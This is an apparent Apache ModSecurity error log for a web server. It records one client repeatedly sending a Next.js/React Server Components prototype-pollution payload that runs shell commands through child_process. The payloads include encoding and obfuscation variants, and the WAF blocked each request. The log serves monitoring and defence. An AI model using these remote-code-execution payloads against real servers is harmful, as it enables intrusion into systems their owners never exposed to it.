{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzpc83uMXRUE9zvQTIwAAAcY"] [Sun Apr 05 15:42:38.214893 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:44760] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzrxQSOrq_iRTM7dqBAAAAQs"] [Sun Apr 05 15:42:38.215871 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:44770] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzrxQSOrq_iRTM7dqBQAAAQo"] [Sun Apr 05 15:42:38.254179 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:44798] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqCQAAAQM"] [Sun Apr 05 15:42:38.268697 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:44806] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzrxQSOrq_iRTM7dqCAAAAQ4"] [Sun Apr 05 15:42:38.275375 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:44868] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzpc83uMXRUE9zvQTJAAAAcM"] [Sun Apr 05 15:42:38.278825 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:44896] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqCgAAAQ0"] [Sun Apr 05 15:42:38.280223 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:44860] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqCwAAARA"] [Sun Apr 05 15:42:38.280224 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:44846] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzpc83uMXRUE9zvQTJQAAAco"] [Sun Apr 05 15:42:38.280360 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44886] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqDAAAAQU"] [Sun Apr 05 15:42:38.282116 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:44832] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqDQAAAQI"] [Sun Apr 05 15:42:38.288978 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:44816] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqBwAAAQQ"] [Sun Apr 05 15:42:38.301400 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:44884] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzrxQSOrq_iRTM7dqDgAAARI"] [Sun Apr 05 15:42:38.335966 2026] [:error] [pid 1309:tid 1388] [client 172.94.9.253:44958] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmzj-XKUNJEHmNu6G7xQAAAJE"] [Sun Apr 05 15:42:38.336128 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:44902] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqEQAAAQQ"] [Sun Apr 05 15:42:38.336167 2026] [:error] [pid 1309:tid 1369] [client 172.94.9.253:44950] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzj-XKUNJEHmNu6G7xgAAAIM"] [Sun Apr 05 15:42:38.336390 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:44934] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmzrxQSOrq_iRTM7dqEgAAAQI"] [Sun Apr 05 15:42:38.336852 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:44960] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqEwAAARA"] [Sun Apr 05 15:42:38.337854 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44918] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzrxQSOrq_iRTM7dqFQAAAQU"] [Sun Apr 05 15:42:38.366252 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:44936] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzrxQSOrq_iRTM7dqEAAAAQ0"] [Sun Apr 05 15:42:38.387043 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:44938] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 